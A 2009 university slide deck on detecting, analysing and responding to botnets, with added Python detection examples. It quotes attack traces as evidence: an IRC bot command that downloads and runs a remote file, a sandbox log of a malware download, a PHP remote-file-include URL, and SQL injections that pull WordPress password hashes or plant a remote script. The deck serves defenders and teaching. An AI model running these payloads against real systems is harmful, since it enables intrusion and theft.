Botnet Phd (Piled Higher and Deeper)
A Presentation About Botnet Detection
For NWACC 09 Security Workshop
by
Craig A Schiller, CISSP-ISSMP, ISSAP
Chief Information Security Officer
Portland State University
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
Primary Source
How Do We Detect Them?
Bot life cycle as drawn on the slide:
1. Computer is exploited (by other bot clients, or by the user browsing malicious sites) and becomes a bot
2. New bot rallies to let the botherder know it's joined the team (C&C)
3. A/V detection: retrieve the Anti-A/V module from the download server
4. Secure the new bot client
5. Listen to the C&C server/peer for commands
6. Retrieve the payload module from the download server
7. Execute the commands (possible traffic to victim)
8. Report result to the C&C channel
9. On command, erase all evidence and abandon the client
How Do We Detect Them?
The same life cycle, with the detection points annotated on the diagram:
1. Computer is exploited (by other bot clients, or by the user browsing malicious sites) and becomes a bot
2. New bot rallies to let the botherder know it's joined the team (C&C)
3. A/V detection: retrieve the Anti-A/V module from the download server
4. Secure the new bot client
5. Listen to the C&C server/peer for commands
6. Report result to the C&C channel
7. Retrieve the payload module from the download server
8. Execute the commands (possible traffic to victim)
9. On command, erase all evidence and abandon the client
Detection points marked on the diagram: Security & FW logs, Known Malware Distribution sites, Known C&C sites, User Complaint, Botlike Traffic, Bad Behavior, Abuse@ notices, Talking to Darknet, Anomalous Protocol Detection
How Do We Detect Them?
"I checked and I didn't see anything"
Host based:
• A/V, Anti-Spam, Anti-Spyware
• Enterprise Reporting
• User Help Desk Tickets
• Abuse notifications
• Quasi-Intelligence Organizations
Monitoring & Analysis:
• Ourmon
• Firewall & Router logs
• IDS/IPS – Host and Network
• DNS
• Server & Workstation Log analysis
• Malware analysis
• Forensics
Ourmon
Free network security monitoring tool, with
Botnet detection capabilities
http://ourmon.cat.pdx.edu/ourmon/index.html
Network Anomaly Detection
• Is it scanning?
• Is it participating in an IRC channel?
• Is there a high control-to-data ratio?
• Is the IRC server/port listed as a known Command & Control server?
• Does the IRC traffic text look botlike?
• Did the host look up or attempt to communicate with a known C&C server?
• Did the host attempt to communicate with an IP address in the Darknet?
Network Anomaly Detection
TCP workweight = (SYNs sent + FINs sent + RESETs returned) / total TCP packets
ww = (Syn + Fin + Reset) / Total TCP
• measure of signal/noise (control/data)
• high number means all control (SYN scanner)
• basically means: an IP is scanning
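An added example (not from the slides or from Ourmon itself) that computes the work weight above over constructed packet records. It assumes tcpdump-style flag letters, counts only pure SYNs (no ACK) as "SYNs sent", counts a RST toward the host it is returned to, and uses packets sent plus received as the denominator; the 0.9 cut-off and 20-packet minimum are assumed thresholds, not Ourmon's.

```python
from collections import defaultdict

# Assumed alert threshold: a work weight near 1.0 means the host's TCP traffic is almost
# all control packets (SYN/FIN/RST) and almost no data, i.e. it behaves like a SYN scanner.
SCANNER_THRESHOLD = 0.9


def workweight(packets):
    """Per-host TCP work weight from (src_ip, dst_ip, flags) packet records.

    flags use tcpdump letters: S=SYN, F=FIN, R=RST, P=PSH, '.'=ACK.
    ww = (SYNs sent + FINs sent + RSTs returned) / total TCP packets sent or received.
    A SYN counts only when it is a pure SYN (connection attempt, no ACK), so the
    SYN/ACK a server answers with does not inflate the server's weight.
    Returns {host: {"ww": float, "syn": int, "fin": int, "rst": int, "total": int}}.
    """
    syn, fin, rst, total = (defaultdict(int) for _ in range(4))
    for src, dst, flags in packets:
        total[src] += 1            # every packet counts for both endpoints
        total[dst] += 1
        if "S" in flags and "." not in flags:
            syn[src] += 1
        if "F" in flags:
            fin[src] += 1
        if "R" in flags:
            rst[dst] += 1          # a RST is "returned" to the host that provoked it
    report = {}
    for host, n in total.items():
        control = syn[host] + fin[host] + rst[host]
        report[host] = {"ww": round(control / n, 3), "syn": syn[host],
                        "fin": fin[host], "rst": rst[host], "total": n}
    return report


def scanners(report, threshold=SCANNER_THRESHOLD, min_packets=20):
    """Hosts above the threshold; min_packets avoids flagging a host seen only once or twice."""
    return sorted(h for h, r in report.items()
                  if r["ww"] >= threshold and r["total"] >= min_packets)


def sample_packets():
    """Constructed traffic: one SYN scanner sweeping 20 closed ports plus one ordinary session."""
    pkts = []
    scanner = "10.0.0.5"
    for i in range(1, 21):
        target = f"192.0.2.{i}"
        pkts.append((scanner, target, "S"))      # probe
        pkts.append((target, scanner, "R."))     # closed port: RST/ACK comes back
    client, server = "10.0.0.7", "198.51.100.9"
    pkts += [(client, server, "S"), (server, client, "S."), (client, server, ".")]
    for _ in range(10):                          # ten data segments each way
        pkts += [(client, server, "P."), (server, client, "P.")]
    pkts += [(client, server, "F."), (server, client, "."),
             (server, client, "F."), (client, server, ".")]
    return pkts


if __name__ == "__main__":
    rep = workweight(sample_packets())
    for host in sorted(rep):
        print(host, rep[host])
    print("scanners:", scanners(rep))
```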
Network Anomaly Detection
Ourmon does a similar calculation with IRC traffic
• measure of signal/noise (control/data)
• high number means non-human communication
• basically means: a bot or an application (game)
Recent large DDoS attack
The fundamental pkts graph normally looks like this:
Ouch, ouch, ouch!
that’s 869k pps – we have physical gE connection to Inet …
“Botlike” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41
dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected]
PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl
mdbn.gif;rm -f *.gif*]
“Normal” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41
dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected]
PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was
nowhere as good a BFF as you. <and other meaningless babble> ]
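An added example (not from the slides or from Ourmon) that parses the Ourmon "IRC text" report line shown on the two slides above and scores the PRIVMSG payload with a shell-command heuristic, so the "botlike" and "normal" samples come out on opposite sides of the threshold. The two sample lines, the sender prefixes and the download host are constructed stand-ins for the slide's, and the vocabulary, weights and threshold are assumptions.

```python
import re

# Ourmon "IRC text" report line, in the layout the slides show; p=[...] carries the raw PRIVMSG.
IRCMSG_RE = re.compile(
    r"IRCMSG: (?P<cmd>[A-Z]+): s=(?P<src>[\d.]+) -> d=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) sflag=(?P<sflag>\d+), channel=(?P<channel>\S+) "
    r"clen=(?P<clen>\d+): p=\[(?P<payload>.*)\]\s*$", re.S)
PRIVMSG_RE = re.compile(r"PRIVMSG (?P<target>\S+) :(?P<text>.*)$", re.S)

# Assumed heuristic vocabulary: tokens a person chatting rarely types but a herder's command line does.
SHELL_CMDS = {"curl", "wget", "perl", "python", "sh", "bash", "rm", "chmod", "cd",
              "tftp", "ftp", "nc", "kill", "killall", "uname"}
URL_FILE_RE = re.compile(r"https?://\S+?\.(?:gif|jpg|png|exe|pl|sh|txt|bin|tgz)\b", re.I)
FLAG_RE = re.compile(r"(?:^|\s)-[A-Za-z]+\b")        # command-line switches such as -o, -f


def parse_ircmsg(line):
    """Split one Ourmon IRC text line into its fields; returns None for non-matching lines."""
    m = IRCMSG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    pm = PRIVMSG_RE.search(rec["payload"])
    rec["target"] = pm.group("target") if pm else None
    rec["text"] = (pm.group("text") if pm else rec["payload"]).strip()
    return rec


def botlike_score(text):
    """Weighted count of shell-like features (weights are assumptions, not Ourmon's)."""
    tokens = re.split(r"[\s;|&]+", text.strip())
    cmds = sum(1 for t in tokens if t.lower() in SHELL_CMDS)
    chains = text.count(";") + text.count("&&") + text.count("|")  # command chaining
    urls = len(URL_FILE_RE.findall(text))                          # fetch of a file by URL
    flags = len(FLAG_RE.findall(text))
    return 2 * cmds + chains + 2 * urls + flags


def is_botlike(text, threshold=4):
    return botlike_score(text) >= threshold


def triage(lines):
    """(src, dst, channel, score) for every line whose PRIVMSG text scores as botlike."""
    out = []
    for line in lines:
        rec = parse_ircmsg(line)
        if rec and is_botlike(rec["text"]):
            out.append((rec["src"], rec["dst"], rec["channel"], botlike_score(rec["text"])))
    return out


# Constructed samples mirroring the two slides; sender prefixes and download host are stand-ins.
SAMPLE_BOT_LINE = (
    "IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, "
    "channel=priv8 clen=5: p=[:bot!~x@192.0.2.10 PRIVMSG #priv8 :fmj curl -o mdbn.gif "
    "http://malware.example/mdbn.gif;perl mdbn.gif;rm -f *.gif*]")
SAMPLE_HUMAN_LINE = (
    "IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, "
    "channel=priv8 clen=5: p=[:jill!~j@192.0.2.11 PRIVMSG #priv8 : OMG, you're just my BFF Jill! "
    "I once had a BFF that was nowhere as good a BFF as you.]")

if __name__ == "__main__":
    for line in (SAMPLE_BOT_LINE, SAMPLE_HUMAN_LINE):
        rec = parse_ircmsg(line)
        print(rec["channel"], botlike_score(rec["text"]), is_botlike(rec["text"]), rec["text"][:40])
```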
Snort signatures
No general purpose intrusion detection; only a limited set of bot-related signatures.
Incident Detection examples
1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee
http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP
TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP
Options (3) => NOP NOP TS: 345145726 2079777105
2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP
TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45
Quasi-Intelligence Organizations
• REN-ISAC
• Shadowserver
• Nanog
• APWG
• Mailing lists
  • Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
  • Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
  • Vendor
• ISC Storm Center
• http://www.emergingthreats.net/
• http://www.malwaredomainlist.com
Lists of Known C&C servers
Shadow Server Sample (columns: IP Address | Port | Channel | Country | Region | State | Domain | ASN | AS Name | AS Description; a cell holding two values lists both, separated by " / ")
81.211.7.122 / 69.18.206.194 | 3267 | #B#t[r2]N#t | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
81.211.7.122 / 69.18.206.194 | 3267 | #B#tN#t[r3] | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
81.211.7.122 / 69.18.206.194 | 3267 | #B�t[r2]N�t | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
81.211.7.122 / 69.18.206.194 | 3267 | #B.tN.t[r3] | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
213.234.193.74 / 85.21.82.55 | 6667 | #secured | RU / RU | MOSCOW / MOSCOW | MOSKVA / MOSKVA | NET.RU / - | 39442 / 8402 | UNICO / CORBINA | AS JSC UNICO / AS Corbina Telecom
http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1
http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP
Quasi-Intelligence Organizations
REN-ISAC
Supported by Indiana University and through relationship with EDUCAUSE and
Internet2, the REN-ISAC is an integral part of higher education’s strategy to improve
network security through information collection, analysis and dissemination, early
warning, and response -- specifically designed to support the unique environment
and needs of organizations connected to served higher education and research
networks; and supports efforts to protect the national cyber infrastructure by
participating in the formal U.S. ISAC structure.
The REN-ISAC receives, analyzes and acts on operational, threat, warning and
actual attack information derived from network instrumentation and information
sharing relationships. Instrumentation data include netflow, router ACL counters,
darknet monitoring, and Global Network Operations Center operational monitoring
systems. Information sharing relationships are established with other ISACs,
DHS/US-CERT, private network security collaborations, network and security
engineers on national R&E network backbones, and the REN-ISAC members.
Spamhaus Drop List
The Spamhaus Don't Route Or Peer List
DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and
netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use
by firewalls and routing equipment.
DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of
listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not
wish to route traffic for.
The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even
if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or
100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and
others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched
away from their original owners (which in most cases are long dead corporations) and are now controlled
by spammers or netblock thieves who resell the space to spammers.
When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from
spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.
Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for
information on use and implementation.
Spamhaus Drop List excerpt 9/17/09
Malware Domain List
DNS for Botnet Detection
"I checked and I didn't see anything"
DB of all lookups for:
• Known C&C
• Known Malicious SW Distros
http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html
KnujOn
10 Most Offensive Registrars
1. XIN NET (Second Time at #1)
2. eNom
3. Network Solutions
4. Register.com
5. PLANETONLINE
6. RegTime
7. OnlineNIC
8. SpotDomains (domainsite)
9. Wild West
10. HICHINA Web Solutions
Search Engine Spam & Clicks 4 Hire
Use Google to search for Clicks-4-Hire relays and search engine spam
site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien
OR xanax OR paxil OR "slot-machine" OR "texas-holdem"
Google site search results
An owned webpage
Browser Intelligence gathering
Links to this web page
Man in the Browser Attack - torpig
Forensics/Intel Gathering
• Quick Forensics
  • Log Analysis
  • Process Explorer
  • TCPView
  • AutoRuns
  • Process Monitor
• Rapier – First Responder Tool
  • Automated Forensics
  • Consistent information gathered regardless of who runs it
• Sleuthing
  • How did they get in?
  • What does it do?
  • What files are used?
  • When did what happen?
• Malware Analysis
• More Sleuthing
Log analysis
I checked and I didn’t see anything
Forensics/Intel Gathering example
Process Explorer listing (Process | PID | CPU | Description | Company Name):
System Idle Process | 0 | 93.36 | |
Interrupts | n/a | 1.56 | Hardware Interrupts |
DPCs | n/a | | Deferred Procedure Calls |
System | 4 | 0.39 | |
smss.exe | 508 | | Windows NT Session Manager | Microsoft Corporation
csrss.exe | 620 | | Client Server Runtime Process | Microsoft Corporation
winlogon.exe | 884 | | Windows NT Logon Application | Microsoft Corporation
services.exe | 944 | | Services and Controller app | Microsoft Corporation
svchost.exe | 1180 | | Generic Host Process for Win32 Services | Microsoft Corporation
wmiprvse.exe | 3400 | | WMI | Microsoft Corporation
svchost.exe | 1252 | | Generic Host Process for Win32 Services | Microsoft Corporation
svchost.exe | 1312 | | Generic Host Process for Win32 Services | Microsoft Corporation
PSXSS.EXE | 896 | | Interix Subsystem Server | Microsoft Corporation
init | 2156 | | Interix Utility | Microsoft Corporation
inetd | 2432 | | Interix Utility | Microsoft Corporation
iexplorer.exe | 3560 | | (no description) | (no company name)
explorer.exe | 8564 | | Windows Explorer | Microsoft Corporation
ccApp.exe | 9208 | | Symantec User Session | Symantec Corporation
VPTray.exe | 8636 | | Symantec AntiVirus | Symantec Corporation
VPC32.exe | 9524 | | Symantec AntiVirus | Symantec Corporation
iexplorer.exe | 6712 | | (no description) | (no company name)
sqlmangr.exe | 9904 | | SQL Server Service Manager | Microsoft Corporation
The two iexplorer.exe entries carry no description or company name; the following slides examine that file.
Forensics/Intel Gathering example
Strings in the file iexplorer.exe
Strings in memory
Centralized Logging
Diagram components: Internet, Log Collection Server, NTSyslog, Analysis, MySQL DataBase
Workstation Log Analysis
Log Parser
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
A/V Centralized Reporting
Use (examine) the central reporting feature of your antivirus server.
Blocked by port blocking rule (Date | Time | Process | Rule | Remote address:port):
3/25/2008 | 12:56:26 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 202.57.184.145:6666
3/25/2008 | 6:26:40 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 83.252.58.149:6666
3/25/2008 | 8:55:30 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 85.21.246.228:6666
3/25/2008 | 11:24:38 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 80.222.68.139:6667
3/26/2008 | 3:37:41 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 85.21.246.228:6666
3/26/2008 | 5:07:33 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 85.21.246.228:6666
3/26/2008 | 7:23:09 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 80.222.68.139:6667
3/26/2008 | 7:38:59 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 85.21.246.228:6666
3/26/2008 | 7:54:09 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 80.222.68.139:6667
3/26/2008 | 10:40:04 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication | 85.21.246.228:6666
3/26/2008 | 10:54:53 AM | C:\Program Files\DNA\btdna.exe | Prevent mass mailing worms from sending mail | 41.220.121.130:25
A/V Centralized Reporting
5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced)
PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\
MediaTubeCodec_ver1.556.0[1].exe
Common Standard Protection:
Prevent common programs from running files from the Temp folder
Action blocked : Execute
MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.
This appeared in the logs before McAfee could detect this malware.
A/V Centralized Reporting
What does quarantine or "No Action Taken" mean?
User defined detection: SPYWARE (Potentially Unwanted Program)
5/12/2008 9:01:50 AM | No Action Taken (Delete failed) | SYSTEM | McShield.exe | C:\Documents and Settings\anyman\Desktop\ctfmona.exe
5/12/2008 9:02:31 AM | User defined detection : No Action Taken (Clean failed because the detection isn't cleanable) | SYSTEM | McShield.exe | C:\Documents and Settings\anyman\Desktop\ctfmona.exe
Detectable Behavior
• Multi-homed DNS
  – FQDN maps to 3 or more IP addresses
    botnet1.example.com pointing to 127.0.0.1
    botnet1.example.com pointing to 127.0.0.2
    botnet1.example.com pointing to 127.0.0.3
    botnet1.example.com pointing to 127.0.0.4
    botnet1.example.com pointing to 127.0.0.5
    botnet1.example.com pointing to 127.0.0.6
• Dynamic DNS used thru commercial site
  – Change IP addresses quickly
• Short DNS TTLs for clients
  – Remap DNS often, check at boot
• FastFlux DNS
  – Change IP addresses and/or DNS names quickly (for spam < 5 minutes) and often
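An added example (not from the slides) that applies the DNS markers above to constructed passive-DNS observations: three or more addresses for one name, a short TTL, and an answer set that keeps changing between quick re-lookups. The thresholds (3 addresses, 300 s TTL, a 5-minute change window) are assumptions taken from the slide's numbers; a legitimate CDN name can trip the multi-homed check, so a hit is a marker to correlate with other evidence, not a verdict.

```python
from collections import defaultdict

MULTIHOMED_MIN_IPS = 3      # slide: FQDN maps to 3 or more IP addresses
SHORT_TTL_SECONDS = 300     # assumed "short" TTL, matching the < 5 minute figure on the slide
FLUX_WINDOW_SECONDS = 300   # assumed: answer set changes between lookups this close together


def analyze_dns(observations):
    """observations: (time_s, fqdn, ttl_s, ip) tuples from a passive DNS sensor or resolver log.

    Returns {fqdn: {"distinct_ips", "min_ttl", "changes", "multi_homed", "short_ttl", "fast_flux"}}.
    """
    by_name = defaultdict(list)
    for t, name, ttl, ip in observations:
        by_name[name.lower().rstrip(".")].append((t, ttl, ip))
    report = {}
    for name, recs in by_name.items():
        answers_at = defaultdict(set)            # the A-record set returned at each lookup time
        for t, _, ip in recs:
            answers_at[t].add(ip)
        times = sorted(answers_at)
        changes = sum(1 for a, b in zip(times, times[1:])
                      if answers_at[a] != answers_at[b] and b - a <= FLUX_WINDOW_SECONDS)
        distinct = {ip for _, _, ip in recs}
        min_ttl = min(ttl for _, ttl, _ in recs)
        short_ttl = min_ttl < SHORT_TTL_SECONDS
        report[name] = {
            "distinct_ips": len(distinct),
            "min_ttl": min_ttl,
            "changes": changes,
            "multi_homed": len(distinct) >= MULTIHOMED_MIN_IPS,
            "short_ttl": short_ttl,
            # fast flux: short TTL *and* the address set keeps moving between quick re-lookups
            "fast_flux": short_ttl and changes >= 2,
        }
    return report


def ranked(report):
    """Names carrying at least one marker, most markers first, ties alphabetical."""
    keys = ("multi_homed", "short_ttl", "fast_flux")
    scored = [(sum(r[k] for k in keys), name) for name, r in report.items()]
    return [name for score, name in sorted(scored, key=lambda x: (-x[0], x[1])) if score]


def sample_observations():
    """Constructed sensor data: the slide's six-address name, a benign name, and a flux name."""
    obs = [(0, "botnet1.example.com", 3600, f"127.0.0.{i}") for i in range(1, 7)]
    obs += [(0, "www.example.org", 3600, "203.0.113.10"),
            (600, "www.example.org", 3600, "203.0.113.10")]
    for k, t in enumerate((0, 120, 240)):        # a new pair of addresses every two minutes, TTL 60
        obs += [(t, "flux.example.net", 60, f"198.51.100.{2 * k + 1}"),
                (t, "flux.example.net", 60, f"198.51.100.{2 * k + 2}")]
    return obs


if __name__ == "__main__":
    rep = analyze_dns(sample_observations())
    for name in ranked(rep):
        print(name, rep[name])
```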
Hiding the C&C Server or Phishing Website
The animation on this slide demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
Passive DNS
http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html
Fast Flux DNS example
Internal Intelligence gathering
Rapier
A First Responder Toolkit
Developed by Steve Mancini, Intel
http://code.google.com/p/rapier/
Malware Hash Registry
Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.
Using whois
$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74
RESPONSE
e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53
(response fields: hash; Unix time in seconds since midnight 1970-01-01; % A/V package detection rate)
Using DNS (dig)
$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT
RESPONSE
"1221154281 53"
http://www.team-cymru.org/Services/MHR/
Alternate C&C Methods
"I checked and I didn't see anything"
Echo-Based Botnets
Echo-based means the bot would simply announce its existence to the C&C. There are several ways of doing this with different volumes of data relayed.
• Connect & forget
• File data
• URL data
Command-Based Botnets
• Web GUI based
• Push rather than pull
• P2P
• IM
• Social Networking (My Space profiles)
• Remote Administration Tools
  • Dameware
  • CarbonCopy
  • Terminal Services
  • PC Anywhere
  • RDP
• Drop zone – ftp is the leading protocol here
• ftp – phishing C&C - regularly reports back (echoes) to an FTP C&C,
Incident Response
• Required by OUS Information Security policy
• PSU Information Security policy requires an Incident Response plan
• PSU has several means of discovering incidents
Carsten Willems' CWSandbox
Components shown on the slide: Ubuntu, VMWare, XP Pro
Malware analysis
CWSandbox
"I checked and I didn't see anything"
<scanner name="AntiVir Workstation" application_version="2.1.9-20" signature_file_version="6.37.0.90">
  <classification>WORM/Rbot.219136.17</classification>
  <additional_info />
</scanner>
<connections_outgoing>
  <connection transportprotocol="TCP" remoteaddr="192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">
    <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245">
      <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" />
      <privmsg_deleted value=":|00||-X||[email protected] PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." />
    </irc_data>
  </connection>
</connections_outgoing>
Analyzing the Malware
CWSandbox Analysis
The Future
Honeypots
Responding to Detection
Blocking Organized Crime supporters
If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.
Use the Spamhaus DROP list to block known evil sites.
Intercage, Inhoster, and Nevacon:
85.255.112.0/20 #SBL36702 (85.255.112.0 - 85.255.127.255)
69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
194.146.204.0/22 #SBL51152 (194.146.204.0 - 194.146.207.255)
Blog that tracks RBN activities:
http://rbnexploit.blogspot.com/
How do they get into User systems?
Guessing weak passwords/phishing attacks
Exploiting Network vulnerabilities
Using Social Engineering
Using web-based Trojans
Trojan websites – Game cheats
Trojan websites - Pornography
Using Email-based Trojans
Phishing & Pharming
Trojan downloads
Using IM-based Trojans (Social engineering)
Rogue DHCP server serving malicious DNS server
How do they get into Servers? php includes
<?php include($vuln); ?>
Parties in the diagram: Attacker, Target.com, Webhost.com
1. Attacker sends GET /a.php?vuln=http://webhost.com/evil.php to Target.com
2. Target makes request to webhost.com/evil.php
3. Malware PHP file 'evil.php' is sent to Target.com and is executed by the include() function
4. The output from evil.php is sent to Attacker
How do they get into Servers? – SQL Injection
--c295b75d-A-[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3
45819 192.168.22.155 80
--c295b75d-B-GET
/shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(66
6,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_u
sers+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.somwhere-in.pdx.edu
Connection: close
--c295b75d-H--
mod-sec
Message: Warning. Pattern match
"(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|fr
om\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|
cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql
)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack.
Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1212486727810932 339469 (2354 3333 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--c295b75d-Z--
Obfu73ca74ion
page=1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697
074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f39
2e6a73223e3c2f7363726970743e%2c6%2F%2A
-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
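An added example (not from the slides) that peels the two encoding layers shown above, percent-encoding of individual letters and a MySQL 0x hex string literal, and then shows why a plain "union select" signature only fires after that normalisation. The encoded parameter is the slide's own, joined onto one line (note that the encoded text reads page=1 where the slide's hand-decoded line shows -1); the regexes are assumptions, not ModSecurity's rules.

```python
import re
from urllib.parse import unquote

# The encoded query string shown on the slide, joined onto one line.
SLIDE_PARAM = (
    "page=1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697"
    "074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f39"
    "2e6a73223e3c2f7363726970743e%2c6%2F%2A"
)

HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})\b")          # MySQL 0x... string literal
UNION_SELECT_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)


def decode_hex_literals(s):
    """Render 0x... literals as text; odd-length, non-ASCII or non-printable ones are left alone."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            text = bytes.fromhex(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return text if text.isprintable() else m.group(0)
    return HEX_LITERAL_RE.sub(repl, s)


def normalize(param):
    """Undo the layers in the order they were stacked: percent-encoding (repeated, so
    double encoding is handled too), then hex literals."""
    prev, cur = None, param
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return decode_hex_literals(cur)


def union_select_in(raw):
    """(matched on the raw parameter, matched after normalisation)."""
    return bool(UNION_SELECT_RE.search(raw)), bool(UNION_SELECT_RE.search(normalize(raw)))


if __name__ == "__main__":
    print(normalize(SLIDE_PARAM))
    print("raw match, normalised match:", union_select_in(SLIDE_PARAM))
```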
Pictures
phpBB photo galleries that permit users to post their own pictures
Parties in the diagram: Attacker, Webhost.com
1. Evil user posts an executable file with a .gif extension (notapic.gif)
2. Evil user browses to the executable gif
3. Webhost executes notapic.gif as web page owner
Other means
Profiles of user accounts (Social Networking sites)
Comment sections that don’t require the user to authenticate
BB’s that permit users to create their own accounts without an administrator
User web pages
